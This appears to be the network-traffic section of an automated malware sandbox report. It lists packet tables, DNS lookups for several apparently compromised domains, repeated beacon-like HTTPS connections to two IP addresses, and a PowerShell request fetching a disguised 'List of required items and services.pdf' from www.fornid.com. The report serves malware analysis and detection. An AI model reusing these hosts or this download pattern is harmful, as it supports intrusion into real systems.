                                                                            Dec 5, 2024 10:40:16.036945105 CET44349851184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:16.053776979 CET49851443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:16.053824902 CET44349851184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:16.498760939 CET44349851184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:16.498826981 CET44349851184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:16.498893976 CET49851443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:16.499212027 CET49851443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:20.509367943 CET49866443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:20.509388924 CET44349866148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:20.509474993 CET49866443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:20.509665012 CET49866443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:20.509677887 CET44349866148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:22.100955009 CET44349866148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:22.102349043 CET49866443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:22.102368116 CET44349866148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:22.648117065 CET44349866148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:22.648288965 CET44349866148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:22.648386955 CET49866443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:22.649305105 CET49866443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:26.665520906 CET49879443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:26.665560007 CET44349879184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:26.665647030 CET49879443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:26.665828943 CET49879443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:26.665842056 CET44349879184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:28.121464968 CET44349879184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:28.122736931 CET49879443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:28.122785091 CET44349879184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:28.581470966 CET44349879184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:28.581557035 CET44349879184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:28.581666946 CET49879443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:28.582199097 CET49879443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:32.603773117 CET49894443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:32.603816986 CET44349894148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:32.603939056 CET49894443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:32.604188919 CET49894443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:32.604203939 CET44349894148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:34.004509926 CET44349894148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:34.005827904 CET49894443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:34.005842924 CET44349894148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:34.550637007 CET44349894148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:34.550875902 CET44349894148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:34.550955057 CET49894443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:34.554903984 CET49894443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:38.697640896 CET49907443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:38.697701931 CET44349907184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:38.697843075 CET49907443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:38.698045969 CET49907443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:38.698061943 CET44349907184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:39.984884024 CET44349907184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:39.985949039 CET49907443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:39.985982895 CET44349907184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:40.447077036 CET44349907184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:40.447175980 CET44349907184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:40.447251081 CET49907443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:40.447666883 CET49907443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:44.463191032 CET49920443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:44.463253021 CET44349920148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:44.463352919 CET49920443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:44.463602066 CET49920443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:44.463617086 CET44349920148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:45.861239910 CET44349920148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:45.864774942 CET49920443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:45.864806890 CET44349920148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:46.406579971 CET44349920148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:46.406740904 CET44349920148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:46.406843901 CET49920443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:46.407392025 CET49920443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:50.462621927 CET49929443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:50.462673903 CET44349929184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:50.462766886 CET49929443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:50.463021040 CET49929443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:50.463035107 CET44349929184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:51.724647045 CET44349929184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:51.727770090 CET49929443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:51.727787971 CET44349929184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:52.184900999 CET44349929184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:52.185000896 CET44349929184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:40:52.185076952 CET49929443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:52.185522079 CET49929443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:40:56.182432890 CET49942443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:56.182475090 CET44349942148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:56.182635069 CET49942443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:56.182852983 CET49942443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:56.182868004 CET44349942148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:57.591888905 CET44349942148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:57.593225956 CET49942443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:57.593245029 CET44349942148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:58.175519943 CET44349942148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:58.175714016 CET44349942148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:40:58.178455114 CET49942443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:40:58.178987026 CET49942443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:02.182046890 CET49958443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:02.182079077 CET44349958184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:41:02.182260036 CET49958443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:02.182574034 CET49958443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:02.182588100 CET44349958184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:41:03.444715977 CET44349958184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:41:03.446155071 CET49958443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:03.446177959 CET44349958184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:41:03.909410954 CET44349958184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:41:03.909481049 CET44349958184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:41:03.909827948 CET49958443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:03.910105944 CET49958443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:07.931598902 CET49971443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:07.931646109 CET44349971148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:41:07.933799028 CET49971443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:07.934005976 CET49971443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:07.934016943 CET44349971148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:41:09.332838058 CET44349971148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:41:09.334644079 CET49971443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:09.334662914 CET44349971148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:41:09.879982948 CET44349971148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:41:09.880167007 CET44349971148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:41:09.880562067 CET49971443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:09.883703947 CET49971443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:13.900430918 CET49986443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:13.900470018 CET44349986184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:41:13.900923967 CET49986443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:13.901266098 CET49986443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:13.901278973 CET44349986184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:41:15.166930914 CET44349986184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:41:15.168108940 CET49986443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:15.168129921 CET44349986184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:41:15.630806923 CET44349986184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:41:15.630891085 CET44349986184.171.244.231192.168.2.11
                                                                            Dec 5, 2024 10:41:15.634392977 CET49986443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:15.639708996 CET49986443192.168.2.11184.171.244.231
                                                                            Dec 5, 2024 10:41:19.635267019 CET49994443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:19.635329962 CET44349994148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:41:19.635420084 CET49994443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:19.635689974 CET49994443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:19.635699987 CET44349994148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:41:21.036128998 CET44349994148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:41:21.037813902 CET49994443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:21.037832975 CET44349994148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:41:21.582751036 CET44349994148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:41:21.582926989 CET44349994148.251.114.233192.168.2.11
                                                                            Dec 5, 2024 10:41:21.582973957 CET49994443192.168.2.11148.251.114.233
                                                                            Dec 5, 2024 10:41:33.640898943 CET49994443192.168.2.11148.251.114.233

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 5, 2024 10:39:25.936517954 CET5371753192.168.2.111.1.1.1
                                                                            Dec 5, 2024 10:39:26.078234911 CET53537171.1.1.1192.168.2.11
                                                                            Dec 5, 2024 10:39:28.942476988 CET5970253192.168.2.111.1.1.1
                                                                            Dec 5, 2024 10:39:29.080564976 CET53597021.1.1.1192.168.2.11
                                                                            Dec 5, 2024 10:39:33.274240017 CET5100953192.168.2.111.1.1.1
                                                                            Dec 5, 2024 10:39:33.412281990 CET53510091.1.1.1192.168.2.11
                                                                            Dec 5, 2024 10:39:45.291163921 CET6189353192.168.2.111.1.1.1
                                                                            Dec 5, 2024 10:39:45.428780079 CET53618931.1.1.1192.168.2.11

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Dec 5, 2024 10:39:25.936517954 CET192.168.2.111.1.1.10x6c63Standard query (0)www.fornid.comA (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:28.942476988 CET192.168.2.111.1.1.10xa720Standard query (0)www.pineappletech.aeA (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:33.274240017 CET192.168.2.111.1.1.10x206cStandard query (0)www.almrwad.comA (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:45.291163921 CET192.168.2.111.1.1.10xd4f1Standard query (0)www.erp-royal-crown.infoA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Dec 5, 2024 10:39:26.078234911 CET1.1.1.1192.168.2.110x6c63No error (0)www.fornid.comfornid.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:26.078234911 CET1.1.1.1192.168.2.110x6c63No error (0)fornid.com93.95.216.175A (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:29.080564976 CET1.1.1.1192.168.2.110xa720No error (0)www.pineappletech.ae91.193.42.13A (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:33.412281990 CET1.1.1.1192.168.2.110x206cNo error (0)www.almrwad.comalmrwad.comCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:33.412281990 CET1.1.1.1192.168.2.110x206cNo error (0)almrwad.com184.171.244.231A (IP address)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:45.428780079 CET1.1.1.1192.168.2.110xd4f1No error (0)www.erp-royal-crown.infoerp-royal-crown.infoCNAME (Canonical name)IN (0x0001)false
                                                                            Dec 5, 2024 10:39:45.428780079 CET1.1.1.1192.168.2.110xd4f1No error (0)erp-royal-crown.info148.251.114.233A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • www.fornid.com
                                                                            • www.pineappletech.ae
                                                                            • www.almrwad.com
                                                                            • www.erp-royal-crown.info

                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.114972893.95.216.1754437700C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:39:27 UTC116OUTGET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                            Host: www.fornid.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:39:28 UTC549INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:39:27 GMT
                                                                            Server: Apache
                                                                            P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
                                                                            Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyisk3G4cITOWZG4GuazMsJ3UP4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZAgCA9dZBWoLjZLevxRYylY%3D000075; expires=Wed, 25-Dec-2024 09:39:27 GMT; Max-Age=1727999; path=/; domain=www.fornid.com; httponly
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Vary: Accept-Encoding
                                                                            Transfer-Encoding: chunked
                                                                            Content-Type: text/html; charset=utf-8
                                                                            2024-12-05 09:39:28 UTC7643INData Raw: 31 31 65 35 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 69 65 37 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6c 74 2d 69 65 39 20 69 65 38 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69
                                                                            Data Ascii: 11e58<!DOCTYPE HTML>...[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7 " lang="it"><![endif]-->...[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="it"><![endif]-->...[if IE 8]><html class="no-js lt-ie9 ie8" lang="it"><![endif]-->...[i
                                                                            2024-12-05 09:39:28 UTC140INData Raw: 65 6e 74 69 22 20 74 69 74 6c 65 3d 22 43 6f 6d 65 20 61 63 71 75 69 73 74 61 72 65 22 20 20 6f 6e 63 6c 69 63 6b 3d 22 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 74 68 69 73 2e 68 72 65 66 29 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 43 6f 6d 65 20 61 63 71 75 69 73 74 61 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 09 09 0a 09 0a 09 3c 2f 75 6c 3e 0a 0a 3c 2f 64 69 76 3e 0a 0a 3c 21 2d 2d 20 2f 42 6c 6f 63 6b 20 6c 69 6e
                                                                            Data Ascii: enti" title="Come acquistare" onclick="window.open(this.href);return false;">Come acquistare</a></li></ul></div>... /Block lin
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 6b 73 20 6d 6f 64 75 6c 65 20 2d 2d 3e 0a 0a 09 3c 21 2d 2d 20 4d 65 6e 75 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 74 6d 5f 74 6f 70 6d 65 6e 75 22 3e 0d 0a 09 09 3c 68 34 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 5f 62 6c 6f 63 6b 22 3e 4d 65 6e 75 3c 2f 68 34 3e 0d 0a 09 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 74 72 65 65 20 64 68 74 6d 6c 22 3e 0d 0a 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 34 2d 75 74 65 6e 73 69 6c 69 2d 70 65 72 2d 6c 2d 69 6e 64 75 73 74 72 69 61 2d 65 2d 6c 2d 65 64 69 6c 69 7a 69 61 22 20 74 69 74 6c 65 3d 22 55 74 65 6e 73 69 6c 69 20 70 65 72 20 6c 27 69 6e 64 75 73 74 72 69 61 20 65 20 6c 27 65 64 69 6c 69 7a 69 61 22
                                                                            Data Ascii: ks module -->... Menu --><div id="tm_topmenu"><h4 class="title_block">Menu</h4><ul class="tree dhtml"><li class=""><a href="https://www.fornid.com/4-utensili-per-l-industria-e-l-edilizia" title="Utensili per l'industria e l'edilizia"
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 74 65 22 20 74 69 74 6c 65 3d 22 4f 6c 69 6f 20 6c 75 62 72 69 66 69 63 61 6e 74 65 22 3e 4f 6c 69 6f 20 6c 75 62 72 69 66 69 63 61 6e 74 65 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 74 6d 5f 73 75 62 55 4c 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 2d 6f 6c 69 6f 2d 69 64 72 61 75 6c 69 63 6f 22 20 74 69 74 6c 65 3d 22 4f 6c 69 6f 20 69 64 72 61 75 6c 69 63 6f 20 49 53 4f 20 33 32 2c 20 34 36 20 65 20 36 38 22 3e 4f 6c 69 6f 20 69 64 72 61 75 6c 69 63 6f 20 49 53 4f 20 33 32 2c 20 34 36 20 65 20 36 38 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e
                                                                            Data Ascii: te" title="Olio lubrificante">Olio lubrificante</a><ul class="tm_subUL"><li class=""><a href="https://www.fornid.com/22-olio-idraulico" title="Olio idraulico ISO 32, 46 e 68">Olio idraulico ISO 32, 46 e 68</a></li><li class=""><a href="https://www.fornid.
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 30 35 2d 72 61 63 63 6f 72 64 65 72 69 61 2d 69 6e 2d 6f 74 74 6f 6e 65 2d 75 73 6f 2d 63 69 76 69 6c 65 2d 69 6e 64 75 73 74 72 69 61 6c 65 2d 65 2d 70 65 72 2d 70 6f 6d 70 65 2d 69 64 72 61 75 6c 69 63 68 65 22 20 74 69 74 6c 65 3d 22 52 61 63 63 6f 72 64 65 72 69 61 20 69 6e 20 6f 74 74 6f 6e 65 20 75 73 6f 20 63 69 76 69 6c 65 2c 20 69 6e 64 75 73 74 72 69 61 6c 65 20 65 20 70 65 72 20 70 6f 6d 70 65 20 69 64 72 61 75 6c 69 63 68 65 22 3e 52 61 63 63 6f 72 64 65 72 69 61 20 69 6e 20 6f 74 74 6f 6e 65 20 75 73 6f 20 63 69 76 69 6c 65 2c 20 69 6e 64 75 73 74 72 69 61 6c 65 20 65 20 70 65 72 20 70 6f 6d 70 65 20 69 64 72 61 75 6c 69 63 68
                                                                            Data Ascii: ss=""><a href="https://www.fornid.com/305-raccorderia-in-ottone-uso-civile-industriale-e-per-pompe-idrauliche" title="Raccorderia in ottone uso civile, industriale e per pompe idrauliche">Raccorderia in ottone uso civile, industriale e per pompe idraulich
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 6d 70 65 2d 70 65 72 2d 74 72 61 74 74 6f 72 69 22 20 74 69 74 6c 65 3d 22 50 6f 6d 70 65 20 70 65 72 20 74 72 61 74 74 6f 72 69 22 3e 50 6f 6d 70 65 20 70 65 72 20 74 72 61 74 74 6f 72 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 35 33 2d 70 6f 6d 70 65 2d 70 65 72 2d 66 6f 67 6e 61 74 75 72 61 22 20 74 69 74 6c 65 3d 22 50 6f 6d 70 65 20 70 65 72 20 66 6f 67 6e 61 74 75 72 61 22 3e 50 6f 6d 70 65 20 70 65 72 20 66 6f 67 6e 61 74 75 72 61 3c 2f 61 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 74 6d 5f 73 75 62 55 4c 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e
                                                                            Data Ascii: mpe-per-trattori" title="Pompe per trattori">Pompe per trattori</a></li><li class=""><a href="https://www.fornid.com/253-pompe-per-fognatura" title="Pompe per fognatura">Pompe per fognatura</a><ul class="tm_subUL"><li class=""><a href="https://www.fornid.
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 22 3e 43 61 72 72 65 6c 6c 69 20 70 65 72 20 69 72 72 6f 72 61 7a 69 6f 6e 65 20 63 6f 6e 20 6d 6f 74 6f 70 6f 6d 70 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 32 32 35 2d 6d 6f 74 6f 70 6f 6d 70 65 2d 69 72 72 6f 72 61 74 72 69 63 69 22 20 74 69 74 6c 65 3d 22 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 22 3e 4d 6f 74 6f 70 6f 6d 70 65 20 69 72 72 6f 72 61 74 72 69 63 69 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66
                                                                            Data Ascii: per irrorazione con motopompe">Carrelli per irrorazione con motopompe</a></li><li class=""><a href="https://www.fornid.com/225-motopompe-irroratrici" title="Motopompe irroratrici">Motopompe irroratrici</a></li></ul></li><li class=""><a href="https://www.f
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 3e 0a 0a 09 09 09 09 09 3c 64 69 76 3e 0a 0a 09 09 09 09 09 09 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 64 61 72 6b 22 3e 54 6f 74 61 6c 65 3c 2f 73 74 72 6f 6e 67 3e 0a 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 70 72 6f 64 75 63 74 5f 70 72 69 63 65 22 3e 3c 2f 73 70 61 6e 3e 0a 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 79 65 72 5f 63 61 72 74 5f 63 61 72 74 20 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 6d 64 2d 36 22 3e 0a 0a 09 09 09 09 3c 70 3e 0a 0a 09 09 09 09 09 3c 21 2d 2d 20 50 6c 75 72 61 6c 20 43 61 73 65 20 5b 62 6f 74 68 20 63 61 73 65 73 20 61 72 65 20 6e 65 65 64 65 64 20 62 65
                                                                            Data Ascii: ><div><strong class="dark">Totale</strong><span id="layer_cart_product_price"></span></div></div></div><div class="layer_cart_cart col-xs-12 col-md-6"><p>... Plural Case [both cases are needed be
                                                                            2024-12-05 09:39:28 UTC8192INData Raw: 65 6c 65 74 74 72 6f 6e 69 63 69 2d 6c 69 66 74 65 72 2d 62 79 2d 70 72 61 6d 61 63 22 20 74 69 74 6c 65 3d 22 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 22 3e 54 72 61 6e 73 70 61 6c 6c 65 74 20 65 6c 65 74 74 72 6f 6e 69 63 69 20 20 4c 49 46 54 45 52 20 42 59 20 50 52 41 4d 41 43 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 72 6e 69 64 2e 63 6f 6d 2f 33 33 39 2d 64 69 73 74 72 69 62 75 7a 69 6f 6e 65 2d 67 72 61 73 73 6f 2d 6d 65 63 6c 75 62 65 22 20 74 69 74 6c 65 3d 22 44 49 53 54 52 49 42 55 5a 49 4f 4e 45 20 47 52 41 53 53 4f 20 4d 45 43 4c 55 42 45 22
                                                                            Data Ascii: elettronici-lifter-by-pramac" title="Transpallet elettronici LIFTER BY PRAMAC">Transpallet elettronici LIFTER BY PRAMAC</a></li></ul></li><li class=""><a href="https://www.fornid.com/339-distribuzione-grasso-meclube" title="DISTRIBUZIONE GRASSO MECLUBE"
